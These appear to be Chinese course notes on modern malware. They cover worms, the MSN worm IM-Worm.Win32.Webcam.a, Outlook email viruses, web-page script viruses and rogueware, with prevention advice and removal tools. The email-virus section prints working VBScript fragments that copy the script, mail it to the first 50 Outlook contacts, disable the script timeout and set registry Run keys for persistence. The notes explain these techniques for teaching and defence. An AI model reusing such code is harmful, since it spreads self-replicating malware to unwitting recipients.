新型计算机病毒

当前，感染可执行文件、数据文件和引导区的病毒已经是过去时，蠕虫、木马、僵尸和RootKit才是计算机病毒进行时。

流行病毒的关键技术

• 蠕虫病毒
• 利用Outlook漏洞编写病毒
• Webpage中的恶意代码
• 流氓软件

蠕虫病毒

• 蠕虫这个名词的由来是在1982年，Shock和Hupp根据《The Shockwave Rider》一书中的概念提出了一种“蠕虫（Worm）”程序的思想。
• 蠕虫（Worm）是病毒的一种，它的传播通常不需要所谓的激活。它通过分布式网络来散播特定的信息或错误，进而造成网络服务遭到拒绝并发生死锁。
• 具有病毒共性：如传播性、隐蔽性、破坏性等
• 独有的性质：不利用文件寄生，对网络造成拒绝服务，以及和黑客技术相结合等等

两类：

• 一种是面向企业用户和局域网而言，这种病毒利用系统漏洞，主动进行攻击，可以对整个互联网可造成瘫痪性的后果。以“红色代码”、“尼姆达”以及最新的“SQL蠕虫王”为代表。
• 另外一种是针对个人用户的，通过网络（主要是电子邮件、恶意网页形式）迅速传播的蠕虫病毒，以爱虫病毒、求职信病毒为代表。

和普通病毒的区别：

蠕虫病毒的特性

• 第一，利用漏洞主动进行攻击
• 第二，病毒制作技术新
• 第三，与黑客技术相结合，潜在的威胁和损失更大
• 第四，传染方式多
• 第五，传播速度快
• 第六，清除难度大
• 第七，破坏性强

蠕虫病毒的机理

蠕虫病毒由两部分组成：一个主程序和另一个是引导程序。

• 主程序收集与当前机器联网的其他机器的信息。利用漏洞在远程机上建立引导程序。
• 引导程序把“蠕虫”病毒带入了它所感染的每一台机器中。

当前流行的病毒主要采用一些已公开漏洞、脚本、电子邮件等机制进行传播。例如，IRC, RPC 等漏洞。

蠕虫病毒实例

MSN蠕虫病毒

1. 基本特征：
名称：IM-Worm.Win32.Webcam.a
原始大小：188,928字节
压缩形式：PESpin
编写语言：Microsoft Visual Basic 6.0
文件名称：LMAO.pif，LOL.scr，naked_drunk.pif等。

2. 行为分析：

（1） 蠕虫运行后，将释放一个名为 CZ.EXE 文件到C盘根目录，并将它拷贝到%system%目录下，文件名为winhost.exe。然后，将文件属性设置为隐藏、只读、系统，同时将该文件创建时间改成同系统文件日期一样，进行欺骗迷惑。同时蠕虫会在C盘跟目录随机生成一个文件，扩展名为PIF或EXE等，该文件用来向MSN好友传播。此外，病毒还会在%system%目录下生成msnus.exe，该文件为蠕虫自身拷贝。

（2）将自身加入到注册表启动项目保证自身在系统重启动后被加载：

• 位置：Software\Microsoft\Windows\CurrentVersion\Run
• 键名：win32
• 键值：winhost.exe
• 位置：Software\Microsoft\Windows\CurrentVersion\RunServices
• 键名：win32
• 键值： winhost.exe

（3）蠕虫病毒会在C盘根目录生成一个图片文件，名字为sexy.jpg，并调用jpg关联程序打开该图片。一般情况下，会用IE打开该图片，打开后效果如下图。

（4）开启本地 TCP10xx端口，频繁连接目标：10.0.1.128:8080，接受黑客控制。
（5）查找MSN窗口，如果存在，则向好友列表中发送消息传播自身。

3. 防范方案：
（1）手工清除。按照上面的行为分析，终止并删除相关进程文件，修复注册表。
（2）用户可以避免接收MSN上发来的陌生附件，包括扩展名为EXE或SCR等的附件，来预防该蠕虫。

如何防范蠕虫

• 预防第一
• 工具保护
• 定期扫描你的系统
• 更新你的防病毒软件
• 不要轻易执行附件中的EXE和COM等可执行程序
• 不要轻易打开附件中的文档文件
• 不要直接运行附件
• 邮件程序设置
• 谨用预览功能
• 卸载Scripting Host
• 警惕发送出去的邮件

利用Outlook漏洞编写病毒

电子邮件成为新型病毒的重要载体
利用Outlook漏洞传播的病毒：

• “爱虫（ILoveYou）”
• “美丽杀（Melissa）”—宏病毒
• “库尔尼科娃”
• “主页(HomePage)”
• “欢乐时光（HappyTime）”

邮件病毒分类：

• 附件方式：病毒的主要部分就隐藏在附件中。
  “主页(HomePage)”和“爱虫（ILoveYou）”病毒，它们的附件是VBS文件，也就是病毒关键部分。
• 邮件本身：病毒并不置身于附件，而是藏身于邮件体之中。
  “欢乐时光（HappyTime）”病毒就是藏身于邮件体中，一旦用户将鼠标移至带毒邮件上，还未阅读邮件就已经中毒了。
• 嵌入方式：病毒仅仅把电子邮件作为其传播手段。
  “美丽杀（Melissa）”是一种隐蔽性、传播性极大的Word 97/2K宏病毒。尽管其核心内容是宏病毒，但在病毒体内有一块代码专门用来传播。当条件符合时，打开用户的电子邮件地址，向前50个地址发送被感染的邮件。

电子邮件型病毒的传播原理

• 自我复制
  Set fso=CreateObject(“Scripting.FileSystemObject”)
  fso.GetFile(WScript.ScriptFullName).Copy(“C:\temp.vbs”)
• 这么两行代码就可以将自身复制到c盘根目录下temp.vbs这个文件。
• 传播——电子邮件病毒是通过电子邮件传播的。
  Set ola=CreateObject(“Outlook.Application”)
  On Error Resume Next
  For x=1 To 50
  Set Mail=ola.CreateItem(0)
  Mail.to=ola.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(x)
  Mail.Subject=“Betreff der E-Mail”
  Mail.Body=“Text der E-Mail”
  Mail.Attachments.Add(“C:\temp.vbs”)
  Mail.Send
  Next
  ola.Quit
• ‘调整脚本语言的超时设置。
  dim wscr,rr set wscr=CreateObject(“WScript.Shell”) rr=wscr.RegRead(“HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”) if (rr>=1) then wscr.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”,0,“REG_DWORD” end if
• ’修改注册表，使得每次系统启动时自动执行脚本
  regcreate “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32”,dirsystem&"\MSKernel32.vbs" regcreate “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL”,dirwin&"\Win32DLL.vbs"
• ‘MSKernel32.vbs和Win32DLL.vbs是病毒脚本的一个副本

电子邮件型病毒预防

• 第一，不要轻易打开陌生人来信中的附件文件。
• 第二，对于比较熟悉的朋友们寄来的信件， 也要注意其附件。
• 第三，切忌盲目转发。
• 第四，去掉Windows脚本执行功能，禁止VBS文件执行。
• 第五，不要隐藏系统中已知文件类型的扩展名称。
• 第六，将系统的网络连接的安全级别设置至少为“中等” .
• 第七，利用工具。

Webpage中的恶意代码

• WebPage中的恶意代码主要是指某些网站使用的恶意代码。这些代码打着是给用户加深“印象”、提供“方便”的旗号做令人厌恶的事情。

• “万花谷”病毒

脚本病毒基本类型

• 第一，基于JAVAScript的脚本病毒
• 第二，基于VBScript的脚本病毒
  可以在Office，浏览器、Outlook中运行,危害性较大。
• 第三，基于PHP的脚本病毒
• 第四，脚本语言和木马程序结合的病毒

流氓软件

流氓软件定义
第一个定义：流氓软件是指具有一定的实用价值但具备电脑病毒和黑客的部分行为特征的软件。它处在合法软件和电脑病毒之间的灰色地带，他会使你无法卸载、并强行弹出广告和窃取用户的私人信息等危害。

第二个定义：流氓软件是介于病毒和正规软件之间的软件，同时具备正常功能(下载、媒体播放等)和恶意行为(弹广告、开后门)，给用户带来实质危害。它们往往采用特殊手段频繁弹出广告窗口，危及用户隐私，严重干扰用户的日常工作、数据安全和个人隐私。

流氓软件是中国大陆对网络上散播的符合如下条件的软件的一种称呼：
1、采用多种社会和技术手段，强行或者秘密安装，并抵制卸载；
2、强行修改用户软件设置，如浏览器主页，软件自动启动选项，安全选项；
3、强行弹出广告，或者其他干扰用户占用系统资源行为；
4、有侵害用户信息和财产安全的潜在因素或者隐患；
5、未经用户许可，或者利用用户疏忽,或者利用用户缺乏相关知识，秘密收集用户个人信息、秘密和隐私。

主要特征

1. 强迫性安装：
   不经用户许可自动安装；
   不给出明显提示，欺骗用户安装；
   反复提示用户安装，使用户不胜其烦而不得不安装等。
2. 无法卸载：
   正常手段无法卸载；
   无法完全卸载；
   不提供卸载程序，或者提供的卸载程序不能用等。
3. 干扰正常使用：
   频繁弹出广告窗口；
   引导用户使用某功能等。
4. 具有病毒和黑客特征：
   窃取用户信息；
   耗费机器资源等

发展过程

1. 恶意网页代码时代（2001年～2002年）
2. 插件时代（2003年～2005年）
3. 软件捆绑时代（2005年至今）
4. 流氓软件病毒化时代（2006年下半年至今）

流氓软件分类

1、广告软件（Adware）
2、间谍软件(Spyware)
3、浏览器劫持
4、行为记录软件（Track Ware）
5、恶意共享软件(malicious shareware)

反流氓软件工具

1. 恶意软件清理助手
2. 瑞星卡卡上网安全助手
3. 金山毒霸系统清理专家
4. 奇虎360安全卫士
5. 微软反间谍软件（Microsoft Antispyware）
6. 完美卸载
7. 超级兔子网络卫士
8. Wopti流氓软件清除大师